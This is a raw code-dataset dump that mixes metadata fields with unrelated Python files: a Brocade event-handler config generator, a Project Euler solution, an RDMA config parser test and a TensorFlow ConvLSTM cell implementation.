4f92229511b265578def8e34d30575292070e584
|
[
"BSD-3-Clause"
] | 11
|
2020-01-24T13:17:20.000Z
|
2020-05-01T07:21:40.000Z
|
# -*- coding: utf-8 -*-
from cognito.core import *
from cognito.core.grid import Grid
from cognito.core.commands import *
| 24.4
| 35
| 0.729508
| 18
| 122
| 4.944444
| 0.5
| 0.370787
| 0.505618
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009524
| 0.139344
| 122
| 4
| 36
| 30.5
| 0.838095
| 0.172131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4a4b93e29772162511ff0c1e9b8c74015e179808
| 8,398
|
py
|
Python
|
pynos/versions/ver_6/ver_6_0_1/yang/brocade_event_handler.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 12
|
2015-09-21T23:56:09.000Z
|
2018-03-30T04:35:32.000Z
|
pynos/versions/ver_6/ver_6_0_1/yang/brocade_event_handler.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 10
|
2016-09-15T19:03:27.000Z
|
2017-07-17T23:38:01.000Z
|
pynos/versions/ver_6/ver_6_0_1/yang/brocade_event_handler.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 6
|
2015-08-14T08:05:23.000Z
|
2022-02-03T15:33:54.000Z
|
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_event_handler(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def event_handler_event_handler_list_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name = ET.SubElement(event_handler_list, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id = ET.SubElement(trigger, "trigger-id")
trigger_id.text = kwargs.pop('trigger_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_vcs_vcs(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
vcs = ET.SubElement(trigger_choice, "vcs")
vcs = ET.SubElement(vcs, "vcs")
vcs.text = kwargs.pop('vcs')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_raslog_raslog(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
raslog = ET.SubElement(trigger_choice, "raslog")
raslog = ET.SubElement(raslog, "raslog")
raslog.text = kwargs.pop('raslog')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_action_action_choice_python_script_python_script(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
action = ET.SubElement(event_handler_list, "action")
action_choice = ET.SubElement(action, "action-choice")
python_script = ET.SubElement(action_choice, "python-script")
python_script = ET.SubElement(python_script, "python-script")
python_script.text = kwargs.pop('python_script')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name = ET.SubElement(event_handler_list, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id = ET.SubElement(trigger, "trigger-id")
trigger_id.text = kwargs.pop('trigger_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_vcs_vcs(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
vcs = ET.SubElement(trigger_choice, "vcs")
vcs = ET.SubElement(vcs, "vcs")
vcs.text = kwargs.pop('vcs')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_raslog_raslog(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
raslog = ET.SubElement(trigger_choice, "raslog")
raslog = ET.SubElement(raslog, "raslog")
raslog.text = kwargs.pop('raslog')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_action_action_choice_python_script_python_script(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
action = ET.SubElement(event_handler_list, "action")
action_choice = ET.SubElement(action, "action-choice")
python_script = ET.SubElement(action_choice, "python-script")
python_script = ET.SubElement(python_script, "python-script")
python_script.text = kwargs.pop('python_script')
callback = kwargs.pop('callback', self._callback)
return callback(config)
| 47.988571
| 114
| 0.667421
| 995
| 8,398
| 5.392965
| 0.043216
| 0.221394
| 0.143123
| 0.134178
| 0.974283
| 0.974283
| 0.974283
| 0.974283
| 0.974283
| 0.974283
| 0
| 0
| 0.208264
| 8,398
| 175
| 115
| 47.988571
| 0.807039
| 0.040129
| 0
| 0.96875
| 1
| 0
| 0.168124
| 0.052461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085938
| false
| 0
| 0.007813
| 0
| 0.179688
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4ab63af6f0861a0fe6bb9d7b84ed58cb771ae2c8
| 148
|
py
|
Python
|
tests/unit/multipolygon/conftest.py
|
phuntimes/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | 1
|
2020-11-26T05:58:23.000Z
|
2020-11-26T05:58:23.000Z
|
tests/unit/multipolygon/conftest.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
tests/unit/multipolygon/conftest.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from tests.fixtures.multipolygon import geojson
from tests.fixtures.multipolygon import geointerface
| 24.666667
| 52
| 0.77027
| 19
| 148
| 6
| 0.736842
| 0.157895
| 0.298246
| 0.508772
| 0.614035
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.108108
| 148
| 5
| 53
| 29.6
| 0.856061
| 0.283784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
435143ab937d678d8cbc1c808b098ee0b4bb63c8
| 1,287
|
py
|
Python
|
python/p8.py
|
tonyfg/project_euler
|
3a9e6352a98faaa506056b42160c91bffe93838c
|
[
"WTFPL"
] | null | null | null |
python/p8.py
|
tonyfg/project_euler
|
3a9e6352a98faaa506056b42160c91bffe93838c
|
[
"WTFPL"
] | null | null | null |
python/p8.py
|
tonyfg/project_euler
|
3a9e6352a98faaa506056b42160c91bffe93838c
|
[
"WTFPL"
] | null | null | null |
#Q: Find the greatest product of five consecutive digits in the 1000-digit number.
#A: 40824
bignum = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
arr = [bignum[i:i+5] for i in xrange(len(bignum)-4)]
max = 0
for i in arr:
tmp = int(i[0])*int(i[1])*int(i[2])*int(i[3])*int(i[4])
if tmp > max:
max = tmp
print max
| 107.25
| 1,011
| 0.912976
| 59
| 1,287
| 19.915254
| 0.559322
| 0.017021
| 0.010213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.829527
| 0.047397
| 1,287
| 11
| 1,012
| 117
| 0.128874
| 0.069153
| 0
| 0
| 0
| 0
| 0.83612
| 0.83612
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.125
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4375cd79a75387dea0092bc7cec499c1277fb1c8
| 2,487
|
py
|
Python
|
insights/parsers/tests/test_rdma_config.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 121
|
2017-05-30T20:23:25.000Z
|
2022-03-23T12:52:15.000Z
|
insights/parsers/tests/test_rdma_config.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 1,977
|
2017-05-26T14:36:03.000Z
|
2022-03-31T10:38:53.000Z
|
insights/parsers/tests/test_rdma_config.py
|
lhuett/insights-core
|
1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8
|
[
"Apache-2.0"
] | 244
|
2017-05-30T20:22:57.000Z
|
2022-03-26T10:09:39.000Z
|
import doctest
import pytest
from insights.tests import context_wrap
from insights.parsers import rdma_config as scc, SkipException
RDMA_CONFIG = """
# Load IPoIB
IPOIB_LOAD=yes
# Load SRP (SCSI Remote Protocol initiator support) module
SRP_LOAD=yes
# Load SRPT (SCSI Remote Protocol target support) module
SRPT_LOAD=yes
# Load iSER (iSCSI over RDMA initiator support) module
ISER_LOAD=yes
# Load iSERT (iSCSI over RDMA target support) module
ISERT_LOAD=yes
# Load RDS (Reliable Datagram Service) network protocol
RDS_LOAD=no
# Load NFSoRDMA client transport module
XPRTRDMA_LOAD=yes
# Load NFSoRDMA server transport module
SVCRDMA_LOAD=no
# Load Tech Preview device driver modules
TECH_PREVIEW_LOAD=no
# Should we modify the system mtrr registers? We may need to do this if you
# get messages from the ib_ipath driver saying that it couldn't enable
# write combining for the PIO buffs on the card.
#
# Note: recent kernels should do this for us, but in case they don't, we'll
# leave this option
FIXUP_MTRR_REGS=no
"""
RDMA_CONFIG_INPUT_EMPTY = """
# Load IPoIB
#IPOIB_LOAD=yes
# Load SRP (SCSI Remote Protocol initiator support) module
#SRP_LOAD=yes
# Load SRPT (SCSI Remote Protocol target support) module
#SRPT_LOAD=yes
# Load iSER (iSCSI over RDMA initiator support) module
#ISER_LOAD=yes
# Load iSERT (iSCSI over RDMA target support) module
#ISERT_LOAD=yes
# Load RDS (Reliable Datagram Service) network protocol
#RDS_LOAD=no
# Load NFSoRDMA client transport module
#XPRTRDMA_LOAD=yes
# Load NFSoRDMA server transport module
#SVCRDMA_LOAD=no
# Load Tech Preview device driver modules
#TECH_PREVIEW_LOAD=no
# Should we modify the system mtrr registers? We may need to do this if you
# get messages from the ib_ipath driver saying that it couldn't enable
# write combining for the PIO buffs on the card.
#
# Note: recent kernels should do this for us, but in case they don't, we'll
# leave this option
#FIXUP_MTRR_REGS=no
"""
def test_rdma_config():
rdma_config = scc.RdmaConfig(context_wrap(RDMA_CONFIG))
assert rdma_config["IPOIB_LOAD"] == 'yes'
assert rdma_config["SRP_LOAD"] == 'yes'
assert rdma_config["SVCRDMA_LOAD"] == 'no'
def test_rdma_config_empty():
with pytest.raises(SkipException):
scc.RdmaConfig(context_wrap(RDMA_CONFIG_INPUT_EMPTY))
def test_rdma_config_doc():
env = {
'rdma_conf': scc.RdmaConfig(context_wrap(RDMA_CONFIG)),
}
failed, total = doctest.testmod(scc, globs=env)
assert failed == 0
| 30.703704
| 76
| 0.765179
| 386
| 2,487
| 4.784974
| 0.279793
| 0.053059
| 0.071467
| 0.027612
| 0.831619
| 0.787223
| 0.731998
| 0.731998
| 0.731998
| 0.731998
| 0
| 0.00048
| 0.161641
| 2,487
| 80
| 77
| 31.0875
| 0.885372
| 0
| 0
| 0.416667
| 0
| 0.027778
| 0.720949
| 0.008444
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.041667
| false
| 0
| 0.055556
| 0
| 0.097222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43bd1364d04de3159331f518c26d241b37fc740f
| 13,894
|
py
|
Python
|
mvsnet/lstm.py
|
haibao637/D2HC-RMVSNet
|
cbed5809c5ee8a6cdb8d63fac825276e67c40349
|
[
"MIT"
] | 9
|
2020-08-25T01:46:02.000Z
|
2020-12-03T15:06:49.000Z
|
mvsnet/lstm.py
|
haibao637/D2HC-RMVSNet
|
cbed5809c5ee8a6cdb8d63fac825276e67c40349
|
[
"MIT"
] | null | null | null |
mvsnet/lstm.py
|
haibao637/D2HC-RMVSNet
|
cbed5809c5ee8a6cdb8d63fac825276e67c40349
|
[
"MIT"
] | 1
|
2021-02-01T06:09:46.000Z
|
2021-02-01T06:09:46.000Z
|
"""Module for constructing RNN Cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
from tensorflow.contrib.compiler import jit
from tensorflow.contrib.layers.python.layers import layers
from tensorflow.contrib.rnn.python.ops import core_rnn_cell
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import activations
from tensorflow.python.keras import initializers
from tensorflow.python.keras.engine import input_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_impl # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables # pylint: disable=unused-import
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
import tensorflow as tf
class ConvLSTMCell(rnn_cell_impl.RNNCell):
"""Convolutional LSTM recurrent network cell.
https://arxiv.org/pdf/1506.04214v1.pdf
"""
def __init__(self,
conv_ndims,
input_shape,
output_channels,
kernel_shape,
dilation=1,
use_bias=True,
skip_connection=False,
forget_bias=1.0,
initializers=None,
name="conv_lstm_cell"):
"""Construct ConvLSTMCell.
Args:
conv_ndims: Convolution dimensionality (1, 2 or 3).
input_shape: Shape of the input as int tuple, excluding the batch size.
output_channels: int, number of output channels of the conv LSTM.
kernel_shape: Shape of kernel as an int tuple (of size 1, 2 or 3).
use_bias: (bool) Use bias in convolutions.
skip_connection: If set to `True`, concatenate the input to the
output of the conv LSTM. Default: `False`.
forget_bias: Forget bias.
initializers: Unused.
name: Name of the module.
Raises:
ValueError: If `skip_connection` is `True` and stride is different from 1
or if `input_shape` is incompatible with `conv_ndims`.
"""
super(ConvLSTMCell, self).__init__(name=name)
if conv_ndims != len(input_shape) - 1:
raise ValueError("Invalid input_shape {} for conv_ndims={}.".format(
input_shape, conv_ndims))
self._dilation=dilation
self._conv_ndims = conv_ndims
self._input_shape = input_shape
self._output_channels = output_channels
self._kernel_shape = list(kernel_shape)
self._use_bias = use_bias
self._forget_bias = forget_bias
self._skip_connection = skip_connection
self._total_output_channels = output_channels
if self._skip_connection:
self._total_output_channels += self._input_shape[-1]
state_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._output_channels])
self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)
self._output_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._total_output_channels])
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._state_size
def call(self, inputs, state,scope=None):
cell, hidden = state
# with vs.variable_scope(scope, reuse=tf.AUTO_REUSE):
new_hidden = _conv([inputs, hidden], self._kernel_shape,
4 * self._output_channels, self._use_bias,dilations=1,name="kernel")
gates = array_ops.split(
value=new_hidden, num_or_size_splits=4, axis=self._conv_ndims + 1)
input_gate, new_input, forget_gate, output_gate = gates
new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell
new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)
output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)
if self._skip_connection:
output = array_ops.concat([output, inputs], axis=-1)
new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)
return output, new_state
def _conv(args, filter_size, num_features, bias, bias_start=0.0,dilations=1,name="kernel"):
"""Convolution.
Args:
args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D,
batch x n, Tensors.
filter_size: int tuple of filter shape (of size 1, 2 or 3).
num_features: int, number of features.
bias: Whether to use biases in the convolution layer.
bias_start: starting value to initialize the bias; 0 by default.
Returns:
A 3D, 4D, or 5D Tensor with shape [batch ... num_features]
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
# Calculate the total size of arguments on dimension 1.
total_arg_size_depth = 0
shapes = [a.get_shape().as_list() for a in args]
shape_length = len(shapes[0])
for shape in shapes:
if len(shape) not in [3, 4, 5]:
raise ValueError("Conv Linear expects 3D, 4D "
"or 5D arguments: %s" % str(shapes))
if len(shape) != len(shapes[0]):
raise ValueError("Conv Linear expects all args "
"to be of same Dimension: %s" % str(shapes))
else:
total_arg_size_depth += shape[-1]
dtype = [a.dtype for a in args][0]
# determine correct conv operation
if shape_length == 3:
conv_op = nn_ops.conv1d
strides = 1
elif shape_length == 4:
conv_op = nn_ops.conv2d
strides = shape_length * [1]
elif shape_length == 5:
conv_op = nn_ops.conv3d
strides = shape_length * [1]
# Now the computation.
kernel = vs.get_variable(
name, filter_size + [total_arg_size_depth, num_features], dtype=dtype)
if len(args) == 1:
res = conv_op(args[0], kernel, strides,dilations=dilations, padding="SAME")
else:
res = conv_op(
array_ops.concat(axis=shape_length - 1, values=args),
kernel,
strides,
dilations=dilations,
padding="SAME")
if not bias:
return res
bias_term = vs.get_variable(
"biases", [num_features],
dtype=dtype,
initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
return res + bias_term
def _deconv(args, filter_size, num_features, bias, bias_start=0.0,dilations=1,name="kernel"):
"""Convolution.
Args:
args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D,
batch x n, Tensors.
filter_size: int tuple of filter shape (of size 1, 2 or 3).
num_features: int, number of features.
bias: Whether to use biases in the convolution layer.
bias_start: starting value to initialize the bias; 0 by default.
Returns:
A 3D, 4D, or 5D Tensor with shape [batch ... num_features]
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
# Calculate the total size of arguments on dimension 1.
total_arg_size_depth = 0
shapes = [a.get_shape().as_list() for a in args]
shape_length = len(shapes[0])
for shape in shapes:
if len(shape) not in [3, 4, 5]:
raise ValueError("Conv Linear expects 3D, 4D "
"or 5D arguments: %s" % str(shapes))
if len(shape) != len(shapes[0]):
raise ValueError("Conv Linear expects all args "
"to be of same Dimension: %s" % str(shapes))
else:
total_arg_size_depth += shape[-1]
dtype = [a.dtype for a in args][0]
# determine correct conv operation
if shape_length == 3:
conv_op = nn_ops.conv1d_transpose
strides = 1
elif shape_length == 4:
conv_op = nn_ops.conv2d_transpose
strides = shape_length * [1]
elif shape_length == 5:
conv_op = nn_ops.conv3d_transpose
strides = shape_length * [1]
# Now the computation.
kernel = vs.get_variable(
name, filter_size + [total_arg_size_depth, num_features], dtype=dtype)
if len(args) == 1:
res = conv_op(args[0], kernel, strides,dilations=dilations, padding="SAME")
else:
res = conv_op(
array_ops.concat(axis=shape_length - 1, values=args),
kernel,
strides,
dilations=dilations,
padding="SAME")
if bias:
res = vs.get_variable(
"biases", [num_features],
dtype=dtype,
initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
return res
_bn=tf.layers.batch_normalization
class ConvBnLSTMCell(ConvLSTMCell):
def __init__(self, conv_ndims, input_shape, output_channels, kernel_shape, dilation=1, use_bias=True, skip_connection=False, forget_bias=1.0, initializers=None, name='conv_lstm_cell'):
super(ConvBnLSTMCell, self).__init__(conv_ndims, input_shape, output_channels, kernel_shape, dilation=dilation, use_bias=use_bias, skip_connection=skip_connection, forget_bias=forget_bias, initializers=initializers, name=name)
self._conv=_conv_bn
class DeConvBnLSTMCell(ConvLSTMCell):
def __init__(self, conv_ndims, input_shape, output_channels, kernel_shape, dilation=1, use_bias=True, skip_connection=False, forget_bias=1.0, initializers=None, name='conv_lstm_cell'):
super(ConvBnLSTMCell, self).__init__(conv_ndims, input_shape, output_channels, kernel_shape, dilation=dilation, use_bias=use_bias, skip_connection=skip_connection, forget_bias=forget_bias, initializers=initializers, name=name)
self._conv=_deconv_bn
def _deconv_bn(args, filter_size, num_features, bias, bias_start=0.0,dilations=1,relu=False,name="kernel"):
res=_deconv(args, filter_size, num_features, bias, bias_start=0.0,dilations=1,name="kernel")
res=_bn(res,training=True,reuse=tf.AUTO_REUSE,name=name+"_bn")
if relu:
res=tf.nn.relu(res)
return res
def _conv_bn(args, filter_size, num_features, bias, bias_start=0.0,dilations=1,relu=False,name="kernel"):
res=_conv(args, filter_size, num_features, bias, bias_start=bias_start,dilations=dilations,name=name)
res=_bn(res,training=True,reuse=tf.AUTO_REUSE,name=name+"_bn")
if relu:
res=tf.nn.relu(res)
return res
class ConvsLSTMCell(rnn_cell_impl.RNNCell):
"""Convolutional LSTM recurrent network cell.
https://arxiv.org/pdf/1506.04214v1.pdf
"""
def __init__(self,
conv_ndims,
input_shape,
output_channels,
kernel_shape,
dilation=1,
use_bias=True,
skip_connection=False,
forget_bias=1.0,
initializers=None,
name="conv_lstm_cell"):
"""Construct ConvLSTMCell.
Args:
conv_ndims: Convolution dimensionality (1, 2 or 3).
input_shape: Shape of the input as int tuple, excluding the batch size.
output_channels: int, number of output channels of the conv LSTM.
kernel_shape: Shape of kernel as an int tuple (of size 1, 2 or 3).
use_bias: (bool) Use bias in convolutions.
skip_connection: If set to `True`, concatenate the input to the
output of the conv LSTM. Default: `False`.
forget_bias: Forget bias.
initializers: Unused.
name: Name of the module.
Raises:
ValueError: If `skip_connection` is `True` and stride is different from 1
or if `input_shape` is incompatible with `conv_ndims`.
"""
super(ConvsLSTMCell, self).__init__(name=name)
if conv_ndims != len(input_shape) - 1:
raise ValueError("Invalid input_shape {} for conv_ndims={}.".format(
input_shape, conv_ndims))
self._dilation=dilation
self._conv_ndims = conv_ndims
self._input_shape = input_shape
self._output_channels = output_channels
self._kernel_shape = list(kernel_shape)
self._use_bias = use_bias
self._forget_bias = forget_bias
self._skip_connection = skip_connection
self._total_output_channels = output_channels
if self._skip_connection:
self._total_output_channels += self._input_shape[-1]
state_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._output_channels])
self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)
self._output_size = tensor_shape.TensorShape(
self._input_shape[:-1] + [self._total_output_channels])
@property
def output_size(self):
return self._output_size
@property
def state_size(self):
return self._state_size
def call(self, inputs, state,scope=None):
cell, hidden = state
# with vs.variable_scope(scope, reuse=tf.AUTO_REUSE):
new_hidden = _conv_bn([inputs, hidden], self._kernel_shape,
1 * self._output_channels,False,dilations=1,relu=True,name="kernel0")
new_hidden = _conv_bn([new_hidden], self._kernel_shape,
2 * self._output_channels, False,dilations=1,relu=True,name="kernel1")
new_hidden = _conv([new_hidden], self._kernel_shape,
4 * self._output_channels, self._use_bias,dilations=1,name="kernel2")
gates = array_ops.split(
value=new_hidden, num_or_size_splits=4, axis=self._conv_ndims + 1)
input_gate, new_input, forget_gate, output_gate = gates
new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell
new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)
output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)
if self._skip_connection:
output = array_ops.concat([output, inputs], axis=-1)
new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)
return output, new_state
| 39.584046
| 230
| 0.704621
| 1,955
| 13,894
| 4.749361
| 0.113043
| 0.042219
| 0.047388
| 0.029725
| 0.904685
| 0.864405
| 0.843296
| 0.835326
| 0.835326
| 0.809047
| 0
| 0.013873
| 0.201022
| 13,894
| 351
| 231
| 39.584046
| 0.822539
| 0.208219
| 0
| 0.73029
| 0
| 0
| 0.040186
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058091
| false
| 0
| 0.128631
| 0.016598
| 0.248963
| 0.004149
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43ca6bfb00619afcba84b74f685f5e68cfa2c211
| 94
|
py
|
Python
|
chicken_dinner/pubgapi/__init__.py
|
az7139/chicken-dinner
|
7b5c1c10cabe1ee335cae515d2d6a96ff431df80
|
[
"MIT"
] | null | null | null |
chicken_dinner/pubgapi/__init__.py
|
az7139/chicken-dinner
|
7b5c1c10cabe1ee335cae515d2d6a96ff431df80
|
[
